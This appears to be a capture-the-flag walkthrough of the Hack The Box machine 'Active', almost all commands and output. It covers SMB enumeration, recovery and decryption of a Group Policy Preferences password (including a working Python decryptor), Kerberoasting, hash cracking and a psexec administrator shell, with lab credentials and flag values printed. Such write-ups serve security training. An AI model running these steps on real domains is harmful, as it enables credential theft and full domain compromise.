Active
Thu, 19 September 2024
Platform: Hack The Box
sudo nmap 10.10.10.100 -sV -Pn -r -g53 -D 1.1.1.1 -p- --min-rate=3000 -sC
Nmap scan report for 10.10.10.100
Host is up (0.055s latency).
Not shown: 65513 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-19 11:00:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49173/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-09-19T11:01:28
|_ start_date: 2024-09-19T10:58:10
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.88 seconds
enum4linux 10.10.10.100
===================================( Session Check on 10.10.10.100 )===================================
[+] Server 10.10.10.100 allows sessions using username '', password ''
=================================( Share Enumeration on 10.10.10.100 )=================================
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.10.100
//10.10.10.100/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/C$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/IPC$ Mapping: OK Listing: DENIED Writing: N/A
//10.10.10.100/NETLOGON Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/Replication Mapping: OK Listing: OK Writing: N/A
//10.10.10.100/SYSVOL Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/Users Mapping: DENIED Listing: N/A Writing: N/A
crackmapexec smb 10.10.10.100 -u '' -p '' --shares
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\:
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL Logon server share
SMB 10.10.10.100 445 DC Users
impacket-smbclient 10.10.10.100
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Type help for list of commands
# tree
[-] No share selected
# shares
ADMIN$
C$
IPC$
NETLOGON
Replication
SYSVOL
Users
# use Replication
# tree
/active.htb/DfsrPrivate
/active.htb/Policies
/active.htb/scripts
/active.htb/DfsrPrivate/ConflictAndDeleted
/active.htb/DfsrPrivate/Deleted
/active.htb/DfsrPrivate/Installing
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/USER
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/USER
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
# cat /active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
active.htb\SVC_TGS
edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18
SVC_TGS:GPPstillStandingStrong2k18
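What gpp-decrypt does above, written out as an added Python example (not the page's own tooling or the gpp-decrypt script): Group Policy Preferences stored the cpassword attribute as base64 with the padding stripped, AES-256-CBC with a zero IV and an AES key Microsoft published in its own MSDN documentation, and the plaintext is UTF-16LE with PKCS#7 padding. Because the key is identical in every domain, a cpassword readable by any domain user from SYSVOL (or, as here, from the replicated Replication share) is effectively plaintext (MS14-025 removed the ability to set new ones but does not delete old files). The sample Groups.xml is the one read from the share above; the `cryptography` package is the only assumption beyond the standard library.

```python
import base64
import xml.etree.ElementTree as ET

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# AES-256 key published by Microsoft for Group Policy Preferences
# (MS-GPPREF 2.2.1.1.4 "Password Encryption"); identical in every domain.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)


def decrypt_cpassword(cpassword: str) -> str:
    """Decrypt a GPP cpassword: unpadded base64 -> AES-256-CBC (zero IV) -> UTF-16LE."""
    # GPP strips the trailing '=' from the base64 text; restore it before decoding.
    padded = cpassword + "=" * (-len(cpassword) % 4)
    ciphertext = base64.b64decode(padded)
    decryptor = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(b"\x00" * 16)).decryptor()
    plaintext = decryptor.update(ciphertext) + decryptor.finalize()
    # PKCS#7: the last byte is the pad length (1..16).
    plaintext = plaintext[: -plaintext[-1]]
    return plaintext.decode("utf-16-le")


def extract_gpp_credentials(xml_text: str) -> list:
    """Return (account, cleartext password) pairs from a GPP XML file.

    Groups.xml uses userName; Services.xml, ScheduledTasks.xml, DataSources.xml,
    Drives.xml and Printers.xml put the same cpassword attribute on their own
    Properties elements, so any of them can be fed in here.
    """
    creds = []
    root = ET.fromstring(xml_text.encode("utf-8"))
    for props in root.iter("Properties"):
        cpassword = props.get("cpassword")
        if not cpassword:
            continue
        account = props.get("userName") or props.get("runAs") or props.get("accountName") or "<unknown>"
        creds.append((account, decrypt_cpassword(cpassword)))
    return creds


# Groups.xml exactly as read from \\10.10.10.100\Replication above.
GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>"""

if __name__ == "__main__":
    for account, password in extract_gpp_credentials(GROUPS_XML):
        print(f"{account}:{password}")
```

Point the same function at every *.xml under Policies/ on SYSVOL; the account attribute differs per file type but the cpassword handling is identical.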
crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --users
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [+] Enumerated domain user(s)
SMB 10.10.10.100 445 DC active.htb\SVC_TGS badpwdcount: 0 desc:
SMB 10.10.10.100 445 DC active.htb\krbtgt badpwdcount: 0 desc: Key Distribution Center Service Account
SMB 10.10.10.100 445 DC active.htb\Guest badpwdcount: 0 desc: Built-in account for guest access to the computer/domain
SMB 10.10.10.100 445 DC active.htb\Administrator badpwdcount: 0 desc: Built-in account for administering the computer/domain
crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON READ Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL READ Logon server share
SMB 10.10.10.100 445 DC Users READ
impacket-smbclient SVC_TGS@10.10.10.100
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
Replication
SYSVOL
Users
# use Users
# tree
/desktop.ini
/Default/AppData
/Default/Application Data
/Default/Cookies
/Default/Desktop
/Default/Documents
/Default/Downloads
/Default/Favorites
/Default/Links
/Default/Local Settings
/Default/Music
/Default/My Documents
/Default/NetHood
/Default/NTUSER.DAT
/Default/NTUSER.DAT.LOG
/Default/NTUSER.DAT.LOG1
/Default/NTUSER.DAT.LOG2
/Default/NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
/Default/NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
/Default/NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
/Default/Pictures
/Default/PrintHood
/Default/Recent
/Default/Saved Games
/Default/SendTo
/Default/Start Menu
/Default/Templates
/Default/Videos
/SVC_TGS/Contacts
/SVC_TGS/Desktop
/SVC_TGS/Downloads
/SVC_TGS/Favorites
/SVC_TGS/Links
/SVC_TGS/My Documents
/SVC_TGS/My Music
/SVC_TGS/My Pictures
/SVC_TGS/My Videos
/SVC_TGS/Saved Games
/SVC_TGS/Searches
/Default/AppData/Local
/Default/AppData/Roaming
/Default/Documents/My Music
/Default/Documents/My Pictures
/Default/Documents/My Videos
/SVC_TGS/Desktop/user.txt
/Default/AppData/Local/Application Data
/Default/AppData/Local/History
/Default/AppData/Local/Microsoft
/Default/AppData/Local/Temp
/Default/AppData/Local/Temporary Internet Files
/Default/AppData/Roaming/Microsoft
/Default/AppData/Local/Microsoft/Windows
/Default/AppData/Roaming/Microsoft/Internet Explorer
/Default/AppData/Roaming/Microsoft/Windows
/Default/AppData/Local/Microsoft/Windows/GameExplorer
/Default/AppData/Local/Microsoft/Windows/History
/Default/AppData/Local/Microsoft/Windows/Temporary Internet Files
/Default/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch
/Default/AppData/Roaming/Microsoft/Windows/Cookies
/Default/AppData/Roaming/Microsoft/Windows/Network Shortcuts
/Default/AppData/Roaming/Microsoft/Windows/Printer Shortcuts
/Default/AppData/Roaming/Microsoft/Windows/Recent
/Default/AppData/Roaming/Microsoft/Windows/SendTo
/Default/AppData/Roaming/Microsoft/Windows/Start Menu
/Default/AppData/Roaming/Microsoft/Windows/Templates
/Default/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/desktop.ini
/Default/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/Server Manager.lnk
/Default/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/Shows Desktop.lnk
/Default/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/Window Switcher.lnk
/Default/AppData/Roaming/Microsoft/Windows/SendTo/Compressed (zipped) Folder.ZFSendToTarget
/Default/AppData/Roaming/Microsoft/Windows/SendTo/Desktop (create shortcut).DeskLink
/Default/AppData/Roaming/Microsoft/Windows/SendTo/Desktop.ini
/Default/AppData/Roaming/Microsoft/Windows/SendTo/Mail Recipient.MAPIMail
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Maintenance
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Command Prompt.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Desktop.ini
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Notepad.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Run.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/System Tools
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Windows Explorer.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Maintenance/Desktop.ini
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Maintenance/Help.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility/Desktop.ini
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility/Ease of Access.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility/Magnify.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility/Narrator.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility/On-Screen Keyboard.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/System Tools/computer.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/System Tools/Control Panel.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/System Tools/Desktop.ini
# cat /SVC_TGS/Desktop/user.txt
d9439cca3b01ff38f9612e1fb7735c6c
impacket-GetUserSPNs -target-domain active.htb -request active.htb/SVC_TGS
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 20:06:40.351723 2024-09-19 11:59:20.995759
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c4e8188d877bf7955a2e3406294b887b$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
echo '$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c4e8188d877bf7955a2e3406294b887b$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' > hashes
john hashes -w=rockyou
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:04 DONE (2024-09-19 21:30) 0.2040g/s 2150Kp/s 2150Kc/s 2150KC/s Tiff1278..Thorne0
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Administrator:Ticketmaster1968
impacket-psexec Administrator@active.htb cmd.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Requesting shares on active.htb.....
[*] Found writable share ADMIN$
[*] Uploading file slNKCUqT.exe
[*] Opening SVCManager on active.htb.....
[*] Creating service Wfie on active.htb.....
[*] Starting service Wfie.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd c:\users
c:\Users> dir
Volume in drive C has no label.
Volume Serial Number is 15BB-D59C
Directory of c:\Users
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
21/07/2018 05:39 �� <DIR>
cd C:\
C:\> chcp
Active code page: 737
impacket-psexec -codec cp737 Administrator@active.htb cmd.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Requesting shares on active.htb.....
[*] Found writable share ADMIN$
[*] Uploading file eTlOQdUj.exe
[*] Opening SVCManager on active.htb.....
[*] Creating service zkon on active.htb.....
[*] Starting service zkon.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd c:\users
c:\Users> tree /F
Folder PATH listing
Volume serial number is 00000200 15BB:D59C
C:.
├───Administrator
│ ├───Contacts
│ ├───Desktop
│ │ root.txt
│ │
│ ├───Documents
│ ├───Downloads
│ ├───Favorites
│ │ ├───Links
│ │ │ Suggested Sites.url
│ │ │ Web Slice Gallery.url
│ │ │
│ │ ├───Microsoft Websites
│ │ │ IE Add-on site.url
│ │ │ IE site on Microsoft.com.url
│ │ │ Microsoft At Home.url
│ │ │ Microsoft At Work.url
│ │ │ Microsoft Store.url
│ │ │
│ │ ├───MSN Websites
│ │ │ MSN Autos.url
│ │ │ MSN Entertainment.url
│ │ │ MSN Money.url
│ │ │ MSN Sports.url
│ │ │ MSN.url
│ │ │ MSNBC News.url
│ │ │
│ │ └───Windows Live
│ │ Get Windows Live.url
│ │ Windows Live Gallery.url
│ │ Windows Live Mail.url
│ │ Windows Live Spaces.url
│ │
│ ├───Links
│ │ Desktop.lnk
│ │ Downloads.lnk
│ │ RecentPlaces.lnk
│ │
│ ├───Music
│ ├───Pictures
│ ├───Saved Games
│ ├───Searches
│ └───Videos
├───Public
│ ├───Documents
│ ├───Downloads
│ ├───Music
│ │ └───Sample Music
│ ├───Pictures
│ │ └───Sample Pictures
│ └───Videos
│ └───Sample Videos
└───SVC_TGS
├───Contacts
├───Desktop
│ user.txt
│
├───Downloads
├───Favorites
├───Links
├───My Documents
├───My Music
├───My Pictures
├───My Videos
├───Saved Games
└───Searches
c:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 15BB-D59C
Directory of c:\Users\Administrator\Desktop
21/01/2021 07:49 μμ <DIR> .
21/01/2021 07:49 μμ <DIR> ..
19/09/2024 01:59 μμ 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 1.137.692.672 bytes free
c:\Users\Administrator\Desktop> type root.txt
18549eb771131962a74088e12b548caa